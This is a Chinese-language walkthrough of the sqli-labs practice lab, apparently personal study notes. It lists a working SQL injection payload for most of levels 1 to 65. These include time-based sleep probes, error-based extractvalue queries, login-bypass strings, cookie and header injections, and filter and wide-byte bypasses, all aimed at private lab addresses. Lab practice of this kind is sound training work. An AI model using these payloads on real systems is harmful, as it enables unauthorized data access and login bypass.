sqli-labs靶机测试笔记
总结:
此lab设计了很多场景,但是个人测试时未按照其规划思路来只是验证出有漏洞即可,做完后个人的感悟就是 非常累,很多题目都是简单的替换单引号,双引号,双引号加括号这类,纯粹体力活。
其中个人认为有价值做的题目是24,26,27,32,34,仅此而已。
注意一点是post型宽字节注入需要在burpsuite里改,使用hackbar时%df会被url加密导致不成功
靶机搭建建议使用vulstudy,一键搭建
1 http://10.150.10.186/Less-1/index.php?id=3' and sleep(3)%23
2 http://10.150.10.186/Less-2/index.php?id=3 and sleep(3)%23
3 http://10.150.10.186/Less-3/index.php?id=3')%20and%20sleep(3)%23
4 http://10.150.10.186/Less-4/index.php?id=3")%20and%20sleep(3)%23
5 http://10.150.10.186/Less-5/index.php?id=3' and sleep(3)%23
6 http://10.150.10.186/Less-6/index.php?id=3" and sleep(3)%23
7 http://10.150.10.186/Less-7/index.php?id=3'))%20and%20sleep(3)%23
8 http://10.150.10.186/Less-8/index.php?id=3' and sleep(6)%23
9 http://10.150.10.186/Less-9/index.php?id=3' and sleep(6)%23
10 http://10.150.10.186/Less-10/index.php?id=3" and sleep(6)%23
11 Username:admin'# Password:xx
12 admin")# xx
13 admin 1') or ('1=1
14 admin x" or "1=1
15 admin x' or '1=1
16 admin x") or ("1=1
17 admin x' and extractvalue(1,concat(0x5c,(select user())))#
18 Dumb Dumb 且user-agnet处替换为x',1,extractvalue(1,concat(0x5c,(select user()))))#
19 Dumb Dumb 且referer处替换为x',1,extractvalue(1,concat(0x5c,(select user()))))#
20 Dumb Dumb 且cookie处替换为uname=x' and extractvalue(1,concat(0x5c,(select user())))#
21 Dumb Dumb 且cookie处替换为uname=eCcpIGFuZCBleHRyYWN0dmFsdWUoMSxjb25jYXQoMHg1Yywoc2VsZWN0IHVzZXIoKSkpKSM=
22 Dumb Dumb 且cookie处替换为uname=eCIgYW5kIGV4dHJhY3R2YWx1ZSgxLGNvbmNhdCgweDVjLChzZWxlY3QgdXNlcigpKSkpIw==
24 考查二阶注入 注册新用户用户名为admin' or 1=1# 之后重设任意密码即可
25 http://192.168.61.242/Less-25/index.php?id=1' aAndnd extractvalue(1,concat(0x5c,(select user())))%23
26 最为困难的是过滤了空格和注释符。其中空格绕过方式:%20 %09 %0a %0b %0c %0d %a0 %00 /**/ /!/ tab ()
http://192.168.61.242/Less-26/index.php?id=1'||extractvalue(1,concat(0x5c,user()))|%271=1
28 http://192.168.61.242/Less-28/index.php?id=a')union%a0select(database()),(user()),(%273
29 http://192.168.2.105/Less-29/index.php?id=x' and extractvalue(1,concat(0x5c,(select user()),1))%23
30 http://192.168.2.105/Less-30/index.php?id=1" and sleep(5)%23
31 http://192.168.2.105/Less-31/index.php?id=1") and extractvalue(1,concat(0x5c,(select user())))%23
32 http://192.168.61.242/Less-32/index.php?id=1�' and extractvalue(1,concat(0x5c,(select user())))%23
33 http://192.168.61.242/Less-33/index.php?id=1�' and extractvalue(1,concat(0x5c,(select user())))%23
34 uname=1%df%27%20and%20extractvalue(1,concat(0x5c,(select user())))%23&passwd=Dumb&submit=Submit
注意需要使用burpsuite改,hackbar改不行
35 http://192.168.2.105/Less-35/index.php?id=1 and sleep(5)%23
36 http://192.168.2.105/Less-36/index.php?id=1�\' and ascii(substr(database(),sleep(5),1))>97%23
37 post:uname=1%df%27%20and%20extractvalue(1,concat(0x5c,(select user())))%23&passwd=x&submit=Submit
38 http://192.168.2.105/Less-38/index.php?id=1' and ascii(substr(database(),sleep(5),1))%3E97%23
39 http://192.168.2.105/Less-39/index.php?id=1 and ascii(substr(database(),sleep(5),1))%3E97%23
40 http://192.168.2.105/Less-40/index.php?id=1')%20and%20ascii(substr(database(),sleep(5),1))%3E97%23
41 http://192.168.2.105/Less-41/index.php?id=1 and ascii(substr(database(),sleep(5),1))%3E97%23
42 lgin.php中post发送:login_user=admin&login_password=1'or+1=1%23&mysubmit=Login
43 lgin.php中post发送:login_user=admin&login_password=1')or+1=1%23&mysubmit=Login
44 lgin.php中post发送:login_user=admin&login_password=1'or+1=1%23&mysubmit=Login
45 lgin.php中post发送:login_user=admin&login_password=1')or+1=1%23&mysubmit=Login
46 http://192.168.2.105/Less-46/index.php?sort=1 and extractvalue(1,concat(0x5c,(select user())))
47 http://192.168.2.105/Less-47/index.php?sort=1' and extractvalue(1,concat(0x5c,(select user())))%23
48 http://192.168.2.105/Less-48/index.php?sort=1 and ascii(substr(database(),sleep(5),1))%3E97%23
49 http://192.168.2.105/Less-49/index.php?sort=1' and ascii(substr(database(),sleep(5),1))%3E97%23
50 http://192.168.2.105/Less-50/index.php?sort=1 and ascii(substr(database(),sleep(5),1))%3E97%23
51 http://192.168.2.105/Less-51/index.php?sort=1' and ascii(substr(database(),sleep(5),1))%3E97%23
52 http://192.168.2.105/Less-52/index.php?sort=1 and ascii(substr(database(),sleep(5),1))%3E97%23
53 http://192.168.2.105/Less-53/index.php?sort=1' and ascii(substr(database(),sleep(5),1))%3E97%23
54 http://192.168.2.105/Less-54/index.php?id=1' and ascii(substr(database(),sleep(5),1))%3E97%23
55 http://192.168.2.105/Less-55/index.php?id=1)%20and%20ascii(substr(database(),sleep(5),1))%3E97%23
56 http://192.168.2.105/Less-56/index.php?id=1')%20and%20ascii(substr(database(),sleep(5),1))%3E97%23
57 http://192.168.2.105/Less-57/index.php?id=1" and ascii(substr(database(),sleep(5),1))%3E97%23
58 http://192.168.2.105/Less-58/index.php?id=1' and ascii(substr(database(),sleep(5),1))%3E97%23
59 http://192.168.2.105/Less-59/index.php?id=1 and ascii(substr(database(),sleep(5),1))%3E97%23
60 http://192.168.2.105/Less-60/index.php?id=1")%20and%20ascii(substr(database(),sleep(5),1))%3E97%23
61 http://192.168.2.105/Less-61/index.php?id=1'))%20and%20ascii(substr(database(),sleep(5),1))%3E97%23
62 http://192.168.2.105/Less-62/index.php?id=1')%20and%20ascii(substr(database(),sleep(5),1))%3E97%23
63 http://192.168.2.105/Less-63/index.php?id=1' and ascii(substr(database(),sleep(5),1))%3E97%23
64 http://192.168.2.105/Less-64/index.php?id=1))%20and%20ascii(substr(database(),sleep(5),1))%3E97%23
65 http://192.168.2.105/Less-65/index.php?id=1")%20and%20ascii(substr(database(),sleep(5),1))%3E97%23